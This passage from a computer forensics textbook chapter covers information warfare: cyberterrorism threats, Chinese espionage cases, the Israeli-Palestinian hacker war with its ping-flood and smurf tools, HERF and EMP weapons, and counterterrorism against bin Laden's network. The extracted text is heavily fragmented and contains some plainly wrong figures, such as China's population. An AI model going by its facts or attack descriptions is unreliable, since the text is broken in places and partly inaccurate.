He or she might have packed a truck with explosives and
sent it careening into a power plant
...
Now, intelligence experts say, it’s possible for a trained computer hacker to darken Gotham from the comfort of home
or a cybercafé (at a coffee house)
...
Worse yet, he or she may enjoy the full backing and technical support
of a foreign government
...
China, Cuba, Russia, Korea, and Iran are among
those deemed a threat, sources later declared
...
This would
disrupt and destroy the U
...
economy
...

Officials are worried because so much of America’s infrastructure is either driven or connected by computers
...
All are vulnerable
...

In 1996, a Swedish hacker wormed his way through cyberspace from London
to Atlanta to Florida, where he rerouted and tied up telephone lines to 11 counties,
put 911 emergency service systems out of commission, and impeded the emergency responses of police, fire, and ambulance services
...
The number of pending FBI cases involving computer
crimes (a category that includes computer infrastructure attacks and financial
crimes) increased from 451 in 1999 to about 1,100 in 2004
...
” The secret war game began
with a set of written scenarios in which energy and telecommunications utilities
were disrupted by computer attacks
...
The scenario posited that people, driven by curiosity, would phone 911 and
overwhelm the system
...
After gaining access to the military’s electronic
message systems, the teams were poised to intercept, delete, and modify all messages on the networks
...
In another exercise, the
DoD found that 74% of test attacks on its own systems went undetected
...
The classic tropes of the spy game have gone
the way of the Model T
...
FBI brass called Ames the worst case of treason in U
...

history
...
Government officials confirmed that scientist Wen Ho Lee, suspected of stealing classified
data from a secret weapons laboratory, downloaded reams of classified nuclear
weapons information from a high-security computer system to one that could be
accessed with relative ease
...
The FBI is talking about millions of lines of computer code here, data bits gathered during the
course of 53 years of research and more than 5,000 nuclear tests—information that
shows how the nation’s most sophisticated nuclear weapons work
...
It
is flabbergasting
...

The someone in question was Wen Ho Lee, a Taiwan-born scientist employed,
until recently, at the Department of Energy’s weapons laboratory in Los Alamos,
New Mexico
...
Prosecutors have
not charged Lee with spying, and he has asserted his innocence, but when FBI agents
searched Lee’s computer after his dismissal, officials say, they discovered that he had
transferred an incredibly large amount of nuclear data from the Energy Department’s
high-security computers to the more accessible network, dumped the information
under bogus file names, then tried to erase the evidence from his hard drive
...

The evidence gathered to date does not show that the security breach resulted in
damage on a massive scale, but it is huge nonetheless
...
Some officials say that may never be known for sure
...
Lee first
came under suspicion in 1996, after the CIA obtained a document showing that
China’s military had obtained classified information about the size and shape of
America’s newest miniaturized nuclear warhead, the W-88
...
When agents in the FBI’s Albuquerque field office pressed for a search warrant in Washington, lawyers at the Justice Department rebuffed the request
...
In any case, by that time the damage was done
...

Their hacker assaults on the Pentagon, NASA (which was very easy), and a U
...
nuclear weapons research lab were described as the most organized and systematic attack on U
...
computers ever discovered
...
They were directed by a
teenage hacker in Israel
...
Recent events make clear
that tighter defenses are needed
...
The loopholes the teenager exploited have been closed, but no computer environment is totally secure
...
You will never get to your destination
...
Chinese computer networks are easy to break into
...

From the moment in 1995 that a commercial Internet provider first gave Chinese citizens access to the Web, the government has tried to maintain what some
cybersurfers derisively call “the Great Firewall of China
...

Sabotage

Sophisticated hackers, meanwhile, are breaking into sensitive Chinese computers (see
sidebar, “Cyberspace Incidents on the Rise in China”)
...
The ultimate aim is to use hacktivism to ameliorate human rights conditions
...
S
...
The latest
warning comes from a report published in 2004 by a network security firm founded
by two former U
...
Navy intelligence officers
...

The most important consideration is that, in one way or another, the government is involved in the operation, regulation, and monitoring of China’s networks
...
S
...

Representatives from companies with major operations in China indicate that
they have never had problems and don’t plan to run scared now
...
The real focus of the control efforts is what the
Chinese call “black and yellow,” or political and pornographic, material
...

Nevertheless, other companies are not convinced that the Chinese government
is overtly (or, for that matter, covertly) engaging in corporate espionage via the
Internet
...
S
...
S
...
That
puts high-tech vendor companies particularly at risk
...
Every business in China is run by the government; any effort to
develop intelligence and promote those industries is a national effort
...
S
...

The U
...
firms that may be at the greatest risk of losing proprietary data include
companies that have set up development laboratories in China, but those companies, eager to gain a foothold in China’s burgeoning information technology (IT)
market, don’t necessarily share the fears of intelligence experts
...
Although the Chinese
view controls and regulations as necessary to facilitate an orderly Internet market
and to protect the country from subversion and other Internet crimes, the controls
are partially the result of political rigidity and bureaucratic inertia
...
The thought that there are lots of people with
time on their hands to explore what the 50 million Internet users in China are doing
is totally impractical
...
A political journal called Tunnel
(http://www
...
com/SiliconValley/Bay/5598/) is said to be edited secretly in
China and sent by email each week to an address in the United States, from which
it is then emailed anonymously back to thousands of Chinese readers
...
ifcss
...
One recent issue extolled individualism and paid tribute to the mother of a student killed
when troops crushed the pro-democracy protest in Tiananmen Square in 1989
...
If you tried
to publish a traditional newsletter promoting democracy in China, you’d surely get
arrested
...

Perhaps they are smart enough
...
Nonetheless, China’s wired population has
grown to 7
...
Although that is a tiny
portion of an overall population approaching 4 billion, China’s Internet users are
virtually by definition the country’s most educated and modern elite
...
What the Chinese
government is really afraid of is political infiltration
...

Perhaps most worrisome to the authorities, young Chinese are using the Net to
coordinate political campaigns
...
Chinese security officials
ignored the demonstration until it reached the streets
...
The incidents weren’t written up
in the Chinese news, but were posted on the Web
...
In Shanghai, a
computer engineer named Lin Hai faces charges of inciting the overthrow of state
power by providing 60,000 email addresses to Big Reference
...


THE SUPER COMPUTER LITERATE TERRORIST
During the next 20 years, the United States will face a new breed of Internet-enabled
terrorists, super computer literate criminals, and nation-state adversaries who will
launch attacks not with planes and tanks, but with computer viruses and logic
bombs
...
The United States faces
an increasingly wired but dangerous world, as evidenced by the following:
Many countries have programs to develop cyberattack technologies and could
develop such capabilities over the next decade and beyond
...

Terrorist groups are developing weapons of mass destruction
...
The Russian
equivalent of the U
...
National Security Agency and organized crime groups recruit the best talent
...

A report by the Washington-based Center for Strategic and International Studies (CSIS) went even further, warning of a future cyberarms race and the rise of terrorist groups supported by super computer literate youngsters bent on disrupting
the Internet
...
Officials say critical infrastructures in the United
States could be targeted in the future as revenge for incidents like the 1999 accidental bombing of the Chinese embassy in Serbia
...

Online extortion and falsification of shipping manifests by criminals and attempts by countries to use hacking techniques to evade trade sanctions are a rising
concern
...

Hackers are finding ways to penetrate these devices and possibly use them as
launching pads for more devastating distributed denial-of-service attacks
...

Therefore, the real threat comes from the design of the U
...
infrastructure and
the people who run it
...
If a major attack is made on the infrastructure, it’s going to happen from the inside
...
However, that future preparedness will be determined by how much
emphasis companies and the government place on fixing known vulnerabilities,
training and education, and enforcing good security policies
...
It’s scary, but it’s really hard to bring down the Internet
...
The intense, lanky 27-year-old is hunting for
holes in a corporate network
...
Any one of these could become a key for breaking into the system
...
He’s a security engineer at an information
security company where he’s paid to tinker with clients’ networks and uncover
their vulnerabilities
...
That demand is spawning a lucrative market
...
1 billion worldwide in 2006 and are growing at a per-year compound rate of 54%, according to
predictions of the research firm GartnerGroup
...
Many ex-hackers have become security consultants
...
Tying security into a company’s e-commerce [3] strategy also is key
...

Meetings with prospective clients begin with a knowledge test of what and
whom the security specialist knows
...
What makes the security professional different from other IT professionals is that they have to know something about
everything
...
Others, though, are hit with sticker shock
...
Mark has to provide a clear return on investment statement
...
Mark has to identify the probability that something will happen—it’s the downstream effect
...
He assesses
a company’s “pain threshold,” or how much security risk it can endure before
the business would shut down
...
Mark then either implements the plan or recommends how the client can
enact it
...
How Palestinian hackers watch and what they know will determine the success of this cyberwar for them
...
Visitors to the site are greeted with the message, “I swear that I
will not use these programs on anyone but Jews and Israelis
...
LoveLetter, Chernobyl
(CIH), and the Melissa Virus (along with 12 Word macro viruses) form the arsenal
for attacking Israeli sites
...

According to sources at iDefense, an international security firm monitoring
the situation, pro-Palestinian hackers use a variety of tools to orchestrate a wellorganized attack against the 400 or more Israeli Web sites that have been hit during the conflict
...
The pro-Palestinians
have been much more aggressive in scope
...

Over 559 Web sites have been targeted by both sides for denial-of-service attacks, attempts to gain root access, system penetrations, defacements, and a variety
of other attacks
...

The conflict began on October 6, 2000, when pro-Israeli hackers created a Web
site to host FloodNet attacks
...
Sixteen tools have been identified as those actively distributed among attackers, with many others being discussed or suspected
of already being deployed
...
The tool launches a “ping of death attack” that,
when utilized by several users against the same target, crashes the system
...
Used simultaneously by multiple attackers,
the tool crashes an email server
...
It is believed to be the tool used for hack attacks on the Israeli Foreign
Ministry site and its Webmaster’s email address
...
Borrowing

442

Computer Forensics, Second Edition

amplifying power from broadcast sites, the hackers send out pings that are boosted
10,000-fold or more
...
org using one computer with a 56K modem and an ADSL line
...
org, a site that provides a list of broadcast sites with an
average amplification of times five, a dial-up user with 28
...
0 kbps of traffic, about two-thirds of a T1 link
...
Netscan
...

Pro-Palestinians recently turned the tables by using broadcast-site attack tools
against Israeli sites
...
Hackers are making moves to gain root access to Israeli computers and servers
...
In essence, a hacker who gains root
access control of a computer can scan, delete, and add files, use it as an attack tool
against others, and even view and hear users whose computers are equipped with
cameras and microphones
...
S
...
Hackers such as DoDi have come
out and said that the current war isn’t just against Israeli, but the United States as
well
...

The irony is that the number of times that U
...
government sites have been targeted by Israelis are more numerous than those times they were targeted by proPalestinians, yet the American media fails to identify the real perpetrators and
victimizes the Arabs as usual
...

How Israelis Watch and What They Know
A group of self-described ethical hackers are taking the reins of Israel’s Web networks into their own hands in the Middle East’s cyberwar
...

According to the IIU mantra, they are dedicated to the Israeli spirit and united to
protect Israel on the Internet against any kind of attacks from malicious hacking

The Information Warfare Arsenal and Tactics of Terrorists and Rogues

443

groups
...
Listed are
over 80 Israeli sites that have been defaced and vandalized by various hacking groups
...
IIU also provides a list of Israeli sites that they believe run services with commonly known security holes such as BIND NXT overflow, IIS 4 holes, and FTP format string bugs
...
com, one of the largest Jewish booksellers on the Web,
serve as a warning to those Israeli sites with suspect security
...
com
text and graphics were recently replaced with the word “Palestine” in flaming letters
and with text asking Israelis if the torah teaches them to kill innocent kids and rape
women
...

Taking credit for the attack is the group GForce Pakistan, a well-known activist
group that has joined forces with Palestinians and other Arab hackers in fighting
the cyberwar against Israeli interests
...
On November 3, 2000, DoDi defaced an Israeli
site and stated he could shut down the Israeli ISP NetVision, host of almost 80% of
the country’s Internet traffic
...

The Muslim extremist group UNITY, with ties to Hezbollah, laid out a fourpart plan for destroying the Israeli Internet infrastructure at the onset of the cyberwar
...
IIU said there is already evidence of
phase-four attacks, such as the destruction of business sites with e-commerce capabilities, which they believe caused a recent 12% dip in the Israeli stock exchange
...
ISPs and
e-businesses must recognize the need to install protection that goes beyond firewalls to provide real security against application-level assaults
...
The stated goal of the project is to inform and
provide solutions wherever the IIU can and, therefore, protect their sites against
political cybervandalism
...

The SODA Project formed an alliance with the Internet security firm 2XS Ltd
...
2XS Ltd
...
On November 3, 2000, IIU contacted 2XS Ltd
...
Another link on the SODA Project is the Internet security information forum SecurityFocus
...
The site is not taking any sides in the Middle
Eastern war
...
They only need to find one
vulnerable victim to succeed, perhaps after checking thousands of potential victims
...
The victims end up
being citizens and businesses in the affected area
...


THE NEW TOOLS OF TERRORISM
Despite increasing concern about cyberterrorism, the tactics and goals of the
world’s terrorist organizations remain low-tech
...
A growing percentage of terrorist attacks are designed to kill as many people as possible
...

However, terrorists are adopting information technology as an indispensable
command-and-control tool
...
Instead of
just finding a few handwritten notebooks and address books, counterterrorism authorities are faced with dozens of CD-ROMs and hard drives
...

Terrorists groups, such as the Osama bin Laden organization, have yet to
demonstrate that they value the relatively bloodless outcome of a cyberattack on a
nation’s critical infrastructure, but the threat remains real
...
If the United States fails to recognize this, then the United States will pay
another high price like they did on 9-11
...
In this
section, these are broadly grouped into three main types: high energy radio frequency
(HERF) guns, electromagnetic pulse (EMP), and other information weapons
...
Electronic circuits are vulnerable to overload;
a HERF gun simply overloads particular circuits to disable specific pieces of equipment that are dependent on that circuit
...
Pointed at a computer, a HERF gun may either permanently or temporarily terminate its operations
...

Although currently limited in range and destructive capacity, in the near future, HERF guns are likely to be substantially more capable and freely available and,
therefore, must be taken seriously
...
The defensive measures that can be employed to reduce the risks of
HERF attacks are not well developed at this stage but include using Gaussian shielding, gaseous discharge devices, and the maintenance of physical separation
...

Initially discovered as a side effect of nuclear tests, the phenomenon has now been
extended to nonnuclear generators
...
A development beam generator with a
1 gigawatt capacity could be used to develop a line-of-sight EMP that would knock
out most unshielded electronic devices within a radius measurable in tens to hundreds of meters, depending on the employment method
...
The current limitations of these weapons are power
generation and capacitor storage capability, but these can be expected to be overcome in the future
...
S
...
EMP weapons are less discriminatory than
HERF guns and could be used to shut down a general area rather than a specific system
...

Other Information Weapons

Several weapons are currently being developed that do not fit in the HERF or EMP
categories
...
The following weapons are described in a variety of freely

446

Computer Forensics, Second Edition

available publications and give an indication of the technologies being developed
and the possible capabilities that may result
...
Low-energy lasers have already been fitted on rifles and armored vehicles and
were deployed during the Gulf War
...

Electric-Power Disruption Technologies

An electric-power disruption weapon was first used during the Gulf War in 1991
...
S
...
The weapon uses light conductive
carbon fibers that wrap around transmission lines and distribution points to cause
a massive short circuit
...
This weapon can be delivered
by cruise missiles, as was the case in the Gulf War, or from manned aircraft
...
Collectively, they offer a decisive addition to military
power
...
Accordingly, nations
developing information strategies should consider investing, both intellectually and
financially, across the gamut of information operations
...

The risk is real
...
As
previously mentioned, the report was the work of a private commission headed by
Donald Rumsfeld, secretary of defense under President Reagan and the second
President Bush
...
The
states trade with one another and build on the progress of other members of the
club to advance their own systems
...

Another factor, the report points out, is that access to information on a global
scale keeps growing exponentially, as the bounds of the Internet in particular remain uncharted
...
S
...

There is a fourth factor: the flexibility with which technical personnel from the
West, and especially from the former Soviet Union, can move to a potential proliferator
...

They are also well aware that it is the acquisition of such whole systems that
garners the most international attention and is most easily policed by the web of
agreements, such as the Missile Technology Control Regime, that the United States
and its allies have spun to guard against proliferation
...

Many such scientists and technicians, particularly in the former Soviet states,
are willing and eager to improve their material lot by helping renegade nations enhance systems that were often acquired from the Soviet Union or that are derivatives of such systems
...
Other than propose alternative employment, the United States and its allies have little to offer, particularly to those motivated by ideological or religious ideals
...
Should a Muslim nation, for example, be taken
over by extremists, it could seek support in other Muslim nations from like-minded
elements that might not necessarily have seized power but would be in a position to
offer the new regime intellectual assistance and perhaps financial aid
...
Otherwise, Libya would
long ago have been in a position to threaten the United States
...

Furthermore, as the recent North Korean and Iranian missile tests demonstrated yet again, a third world country whose leadership is determined to advance
its capabilities will not be deterred by nonproliferation regimes
...

Stolen Thunder Tools
Like a neutron bomb (whose design Chinese agents allegedly stole), the Cox report
demolished any doubt that China engages in espionage against the United States
(see sidebar, “China Grabs U
...
Technology to Modernize Its Military”), but it left
standing a whole array of big questions and small mysteries
...
S
...
The deal might have gone through if not
for a small hitch: the manufacturer recalled that the men, using a different company
name, had tried earlier to get a U
...
license to export the gyroscopes to China—and
had been turned down
...
S
...
Yi has pleaded not guilty; his coconspirator,
Collin Shu, a Canadian, was also arrested and pleaded not guilty
...
The
gyroscopes are generally used for guiding missiles or maneuvering fighter jets
...


I NTENSE D EBATE
The gyroscope case is one of the latest incidents illuminating Beijing’s voracious
appetite for high-end U
...
technology that has military capabilities
...
A report by a panel chaired by Rep
...
), in
1999, suggested that China may have married U
...
computer technology with
nuclear weapons designs it stole in the 1980s from U
...
labs
...

Proponents of the sale of high-tech goods to China say they help open the country to influences like American television shows beamed off U
...
-manufactured
satellites
...
S
...

The present and past administrations have generally supported this view, but in
1999, in a surprising turnaround, Clinton advisers blocked California satellite maker
Hughes Electronics Corp
...
Various officials offered different explanations for the decision, but the government told Hughes the launches could transfer too much militarily significant
know-how
...
Pentagon officials counter that nobody is assessing the impact of the fiber-optic lines, electronicswitching gear, computers, and satellites pouring into China
...

In March 1996, as Beijing was threatening Taiwan with missiles, the State and
Defense departments approved the export to China of two satellite receiving stations
worth $7
...
The recipient, documents show, was China Electronic Systems
Engineering Company, part of China’s military
...
The National Security Agency
signed off on the deal, but congressional critics say the sale deserves a second look
...
Experts point out that the Chinese can evade U
...
export controls by
harnessing together less powerful machines—or buying high-capacity machines on
a Russian Internet site
...
The
Cox report calls for greater scrutiny, including spot checks in China to ensure the
best machines are used only for civilian purposes
...

Experts say China’s rapidly modernizing military is still years from catching up
with the United States, at best, but some worry that China will put high-tech imports
to their best military uses and turn into a surprising adversary
...
S
...
Why would
China’s spy masters tip their hand? Maybe they bungled, giving away too much in

450

Computer Forensics, Second Edition

an effort to plant a double agent
...

The release of the bipartisan Cox report in 1999 certainly did that
...
For two decades, it says, China has used spies, front companies, and scientific exchanges to filch some of America’s most precious secrets,
but on closer reading, it is still unclear how much damage has been done to U
...
national security
...

Democrats on the congressional panel, which was led by Republican Rep
...
There are, unfortunately, a number of places where the
report reaches to make a point and, frankly, exaggerates
...
It’s possible, as Cox and some Pentagon officials
argue, that the sum of China’s technological thievery is even larger than its parts
...
S
...
The CIA discovered this in 1995
when a Chinese “walk-in” (an agent who came forward voluntarily) handed over
a Chinese document stamped “secret
...

One was the size of the “package” containing the nuclear device, whose yield (explosive power) was already available from open sources
...
It’s more like
looking at a car’s engine compartment and knowing how much horsepower the
block can produce
...
The Chinese document, dated 1988, also described the size and yield of four other U
...

warheads, but that may have come from publicly available sources
...
S
...
Most experts think that its goal is to ensure China’s “second-strike capability”—the ability to retaliate for a nuclear attack, not to launch a first strike
...

The first of the new missiles, the DF-31, won’t be able to reach most of the territory of the United States, but could it intimidate China’s neighbors or make the
United States hesitate to defend Taiwan in a crisis? Definitely
...
S
...
The report says the two companies ignored restrictions on
technology transfers and gave away sensitive information while helping China investigate a series of failed attempts to launch the firms’ satellites into space
...
How to compensate for the violent winds that buffet rockets in flight
...
How to better investigate failed launches
...

Still, it is unclear how quickly China will be able to make those improvements
...

The spying and technology transfer is of enormous concern, but, having it in your
hand doesn’t mean you know how to use it or effectively deploy it
...
The question is
what it does with them
...
The Cox report says they have
been used in nuclear weapons applications, such as modeling hypothetical explosions rather than conducting real ones after Beijing signed the Comprehensive Test
Ban Treaty in 1996
...
S
...

Radar

The Cox report also asserts that classified U
...
radar research stolen by the People’s
Republic of China could be used to threaten U
...
submarines, but the White House
produced a letter from the Navy to the Justice Department stating, It is difficult to
make a case that significant damage has occurred from the alleged disclosure
...
One possible explanation for
Beijing’s disclosure of its own espionage is that Chinese leaders wanted the world to
know they could build a large, modern arsenal—if they wanted to
...
If that was the plan, it just might have worked
...

For example, investigators at Los Alamos National Laboratory, in 2000, discovered that computer hard drives containing nuclear weapons data and other
highly sensitive material stored in a vault at the laboratory had disappeared, according to several United States Government officials
...
Officials reported that the hard drives were missing on June 1, 2000,
after officials went to search for them following forest fires in the area
...

The material, stored in the vault of the laboratory’s X Division, where nuclear
weapons are designed, contained what officials described as nuclear weapons data
used by the government’s Nuclear Emergency Search Team, or NEST, which responds to nuclear accidents and nuclear-related threats from terrorists
...
In addition, the missing material included intelligence information concerning the Russian nuclear weapons program
...
Habiger, conducted an intensive search and investigation at Los Alamos but did not find the
data
...
Officials said they remained uncertain whether the
data has been misplaced or stolen
...
As previously mentioned, Dr
...
Dr
...
Dr
...

The discovery of Dr
...

Congress later passed legislation creating a new nuclear weapons agency within the
Energy Department to oversee Los Alamos and the nation’s other nuclear weapons
laboratories
...
Lee
was dismissed
...
The officials are said to have assumed that the material was in use somewhere in the lab
by Los Alamos scientists
...
The hard drives were eventually found near a trash-can
...
S
...
In mid-1998, the CIA,
working with Albania’s intelligence service, had rolled up a terrorist cell guided by
wanted dead or alive Saudi exile Osama bin Laden
...
S
...
The Middle Eastern plotters were sent home to face prosecution
...

The United States has yet to nail all of those responsible for the Cole attack
(even though a few suspects have been detained), but that first guess made a
macabre sort of sense to those waging the interminable war against terrorism
...

This war is waged largely in the shadows, a cat-and-mouse contest between terrorists and intelligence agencies that only rarely comes into public view
...
S
...
Fragmentary bits of data gleaned from eavesdropping satellites, human
informers, friendly governments, and old-fashioned police work are pieced together to deter and disrupt terrorist attacks on a regular basis
...
S
...
S
...
The posts went on high alert, and

454

Computer Forensics, Second Edition

the aircraft carrier USS Truman was diverted from Naples to Crete
...

The war comes out of the shadows when U
...
intelligence and law enforcement
agents lose a battle, such as in the Cole attack or the 1998 bombings of two U
...
embassies in East Africa (see sidebar, “Putting Terror Inc
...
As traumatic as they
are, though, for each such loss there is many an unheralded success—dashing terrorists’ hopes of more bloodied bodies and battered buildings on the world’s TV screens
...
ON TRIAL
Ali Mohamed is a man of many faces: Egyptian intelligence agent, U
...
Army paratrooper, FBI informant, and aide to wanted dead or alive terrorist mastermind
Osama bin Laden
...
S
...
Bin Laden looked at the picture of the American Embassy and
pointed to where a truck could go as a suicide bomber
...
A sweeping 319-count indictment charges bin
Laden and 20 others with a terrorist crime spree dating back to 1991
...

The attacks include not only those on the U
...
embassies in 1998 (which left over 220
dead and 5,000 injured), but also attacks on U
...
troops in Somalia and Saudi Arabia
...
S
...
S
...


I NFIDELS
The October 2000 suicide bombing of the USS Cole and the 9-11 attacks (tied by
investigators to bin Laden’s network) have added fresh urgency to the government’s
efforts to thwart the wanted dead or alive Saudi exile, now hiding in the badlands of
Afghanistan or nearby in Pakistan
...
The indictment imparts an image of
a paranoid, virulently anti-American network determined to purge Muslim lands of
“infidels
...


The Information Warfare Arsenal and Tactics of Terrorists and Rogues

455

Proving a grand conspiracy may be difficult
...
Through electronic eavesdropping, for example, U
...
officials quickly learned of bin Laden’s involvement in
the embassy blasts, but they are loath to introduce such sensitive records into court
...
Prosecutors tie bin Laden to the conspiracy largely through his
funding of al-Qaeda and his calls for holy war against the West
...
For others, it is their work in
bin Laden’s businesses in Sudan, from construction and agriculture to an investment
house, which prosecutors call fronts for terror
...

With his guilty plea, Mohamed has made the prosecution’s job far easier
...
He strongly hinted he could connect the dots to the five others in custody, who have all pleaded not guilty
...
Al-Owali, a Saudi Arabian, allegedly filmed
a statement before the bombing celebrating his “martyrdom,” and rode in the pickup
carrying the Nairobi bomb; he was found later in a hospital with keys to the truck’s
padlock nearby
...
A third defendant, Saddiq Odeh, a Jordanian, is allegedly tied to TNT and detonators used in Tanzania
...
His case was recently severed from the
others after he stabbed a prison guard in the eye
...
A tire
store manager in Arlington, Texas, he acted, prosecutors contend, as a bag man and
passport fixer while working as bin Laden’s personal secretary
...
Mohamed, a former U
...
Army sergeant, a naturalized American citizen born in Egypt, claims he worked with el-Hage in Nairobi

456

Computer Forensics, Second Edition

and that during a visit to el-Hage’s house, bin Laden’s security chief told him to conduct surveillance on American, British, French, and Israeli “targets” in Senegal
...
Mohamed’s guilty
plea has thrown a wrench into their strategies
...
If Ali Mohamed does
indeed take the stand, his credibility will likely come under fire
...

El-Hage, a naturalized U
...
citizen, certainly seems to be feeling the pressure
...

The plea, offered without consulting with prosecutors, was thrown out because elHage told the judge he was acting not out of guilt, but because he wanted to escape
the humiliation of a trial
...
Court documents place the 43year-old el-Hage within a rogues’ gallery of terrorists
...

Further revelations may come from Ali Mohamed, who is cooperating with the
FBI
...
Al-Qaeda and its allies received explosives
training at Hezbollah camps in Lebanon, Mohamed claimed, and received bombs
disguised to look like rocks from the Iranians
...
Iran
is an untold story in this
...
Ties to the USS Cole bombing may well emerge from trial testimony, and a further indictment in New York (this one under seal) names even
more alleged bin Laden conspirators
...

In November 2000, for instance, authorities in Kuwait, who thought they
had radical Islamists under control, got a nasty shock
...
S
...
A suspect, Mohammed al-Dosary, led investigators to a desert weapons cache that held 293
pounds of high explosives, 1,450 detonators, and, for good measure, 5 hand
grenades
...
S
...

Even more worrisome, the plotters had helpers in Kuwait’s government, one of
the closest U
...
allies in the Persian Gulf
...
Bin Laden has tapped into what U
...
officials sardonically
call the “Afghan Veterans Association,” Arabs who answered the call to holy war
against the Soviets two decades ago—at the time, with backing from the CIA
...
S
...
That case
sounded the first broad alarms that thousands of Arab veterans from the Afghan
war had now trained their sights on the West
...

Bin Laden finances and motivates a “network of networks,” co-opting homegrown terrorist groups, from Egyptian Islamic Jihad to the Abu Sayyaf group in the Philippines
to the Islamic Movement of Uzbekistan
...
The
United States government was slow to recognize what bin Laden was doing
...

Without fanfare, Washington in 1999 opened a new front in the war
...
U
...
intelligence agencies routinely tip off local security services to problems
they didn’t even know they had
...
In Albania, Algeria, Pakistan, Syria, and elsewhere, bin Laden devotees have
been booted out, often on immigration charges and with little publicity
...
The war on terror is fought down
in the weeds
...
It’s the slow, dirty, grunt police work that goes
on every day
...
S
...
CIA operatives in
more than 60 countries pressured, pleaded, and paid local authorities to crack
down on Islamic radicals
...
This cost the agency
a great deal of money and resources
...
Bin Laden and his organization,
al-Qaeda, are still itching to pull off an attack in pro-Western Jordan, and though
U
...
and Kenyan authorities busted up an al-Qaeda operation in Nairobi in early
1998, the victory was only temporary
...
They were
able to use the infrastructure that was in place, spin up a new cell, and go after the

458

Computer Forensics, Second Edition

target
...
S
...

Just as sobering is what officials call the “mujahideen underground railroad,” a
vast effort to move young recruits to terrorist training camps in Afghanistan
...
Using professionally
forged documents and Hotmail Internet accounts to keep in touch, network members move people through Italy, the Balkans, Turkey, and Dubai
...
Inside, the only sign of Islamic activism is a hand-made sign
protesting Russia’s war in Muslim Chechnya, but U
...
, British, and Yemeni officials
say the mosque is a recruitment station for terror camps and that its fundamentalist imam, Abu Hamza al-Masri, has ties with terror groups abroad
...
While some of the funds may go to legitimate Islamic
charity work, bin Laden receives a steady stream from mosques, charities, and
schools
...
That’s what he’s done
...

Despite the nature of the quarry, progress is being made in the war on terrorism
...
There’s a chance that the
United States is even gaining ground, but not very much
...
Jordanian officials alerted U
...
agencies to the millennium threat
...
S
...
This is a dramatic turnaround
...
S
...

Through eavesdropping and, increasingly, informants, Western spy agencies
are gaining a clearer picture of the structure of bin Laden’s network and his inner
circle, but penetrating the distinct cultures in which the terrorists operate is difficult
...
One advantage: the terrorist networks’ decentralized structure
...
The CIA is more aggressive but is hampered
by 1995 regulations restricting recruitment of sources with unsavory backgrounds
...

Nor have the terror fighters been able to get bin Laden himself, who still moves between homes, residences, and underground bunkers in Afghanistan or in neighboring
Pakistan
...


The Information Warfare Arsenal and Tactics of Terrorists and Rogues

459

One is provided by his dwindling Taliban hosts, and his own personal security detail
includes an elder son who is said to rarely leave his side but now is presumed dead
...

The terrorists do their own spying
...
The Cole
attackers slipped through a small window (four hours every other month) as U
...

ships refueled in Yemen
...
Sometimes, terrorists dispatch walk-ins, “informers” who proffer false information to
U
...
agents
...
S
...
When that fact became public, he switched to a system of mule
messengers and code words
...
S
...
When Khalil Deek was arrested in Pakistan in
December 1999, U
...
and Jordanian officials weren’t sure how much of the millennium plot they’d unraveled
...
U
...
agents rushed the
computer to the Fort Meade, Maryland, campus of the code-breaking National Security Agency
...
The National Security Agency had to
know whether Deek had operational information such as where and how the attacks were planned
...
Fighting terrorism is like being a soccer goalie
...


THE IW GAMES
The number of cyberattacks and intrusions into Pentagon computer networks in
2004 is expected to top off at 68,000, an increase of 9% from 2003, according to the
DoD
...
Ninety-nine percent of the successful attacks and intrusions can be attributed to known vulnerabilities and security gaps that have gone unfixed and poor security practices by defense agencies
...
Hackers stung the Pentagon at least 66,366 times in 2003 and 58,493 times in 2002
...
By exposing

460

Computer Forensics, Second Edition

and highlighting vulnerabilities, the attacks can actually help inoculate the system
for times of crisis—but only if the appropriate lessons are learned now
...
The Pentagon is currently operating in a relatively benign international environment, yet they were hard pressed to
deal with the detected hacks
...

In addition to weak security practices by DoD network administrators, the increase in the number of attacks can be attributed to the greater availability of sophisticated hacker tools on the Internet
...
The increase in the number and the sophistication of the attacks poses a significant threat to DoD plans to use computer
networks as part of its overall strategy to fight future conflicts, a concept known
throughout the Pentagon as “network-centric warfare
...
However, sophisticated encryption devices designed by the
National Security Agency protect the classified networks
...
Regardless of classification, there are connections and the Pentagon is dependent on that infrastructure
...
Due to legal and privacy [5] restrictions, the department is prohibited from pursuing hackers beyond its networks
...
The agency doesn’t go outside of their firewalls,
but they’d like to
...
” Pentagon criminal investigators are searching for a legal framework that
would enable them to use one search warrant to track hackers back through the
multitude of Web sites they often use as launching pads for their attacks
...

How Other Countries Are Getting into the IW Games
According to the CIA, other countries are developing cyberattack capability
...
Not only
do they have to guard against Love Bug worms and security holes in Microsoft Outlook, but also they’ve got to worry about Fidel Castro hacking into their computers
...
Castro’s armed forces
could initiate an IW or computer network attack that could disrupt the military
...
There’s certainly
the potential for Cuba to employ those kinds of tactics against the United States’
modern and superior military
...

In addition to Cuba, terrorists such as Osama bin Laden are now using the
Internet and encryption to cloak communications within their organizations
...
They send their operational
planning and judgments using encryption
...
Bin Laden allegedly
uses encryption (and a variant of the technology, called steganography) to evade U
...

efforts to monitor his organization
...

And what about Castro? It might seem odd to view a country best known for
starving livestock, Elian Gonzalez, and acute toilet paper shortages as a looming
threat, but the Pentagon seems entirely serious
...
They have a strong intelligence apparatus,
good security, and the potential to disrupt the U
...
military through asymmetric tactics
...

The CIA is detecting with increasing frequency, the appearance of doctrine and
dedicated offensive cyberwarfare programs in other countries
...

IW is becoming a viable strategic alternative for countries that realize that, in
conventional military confrontation with the United States, they will not prevail
...


462

Computer Forensics, Second Edition

The United States can make the enemy’s command centers ineffective by
changing their data system
...
The enemy’s banking system
and even its entire social order can also be dominated
...
These countries perceive that cyberattacks, launched from
within or outside the United States, represent the kind of asymmetric option they
will need to level the playing field during an armed crisis against the United States
...

The technology to launch cyberattacks is already well known
...

Both the Chinese and Russians have expressed interest in some form of international effort to place curbs on such attacks
...
Organizations such
as Interpol have the structure in place to facilitate in sharing IW data between countries, but a common basis of legislation, policy, and procedures is still needed
...
They attack American
interests and citizens abroad because of the wealth of opportunities, the symbolic
value, and the exposure from the world’s most extensive news media
...

The Air Force has also been called on to counter the IW arsenal and tactics of
terrorists and rogues, as it did in striking targets in Afghanistan and Sudan after the
August 1998 bombing of U
...
embassies in Kenya and Tanzania
...

Others point to “cyberterror,” weapons of mass destruction, or other alarming
scenarios
...
S
...


The Information Warfare Arsenal and Tactics of Terrorists and Rogues

463

Although this is not an issue for the Air Force alone, this chapter recommended a
number of specific steps that could better prepare the U
...
military and private companies to confront “the new terrorism” and its IW arsenal and tactics, as follows
...

The PAF team found that changing technologies and tactics accompany equally
important changes in the motives and structure of terrorism itself
...
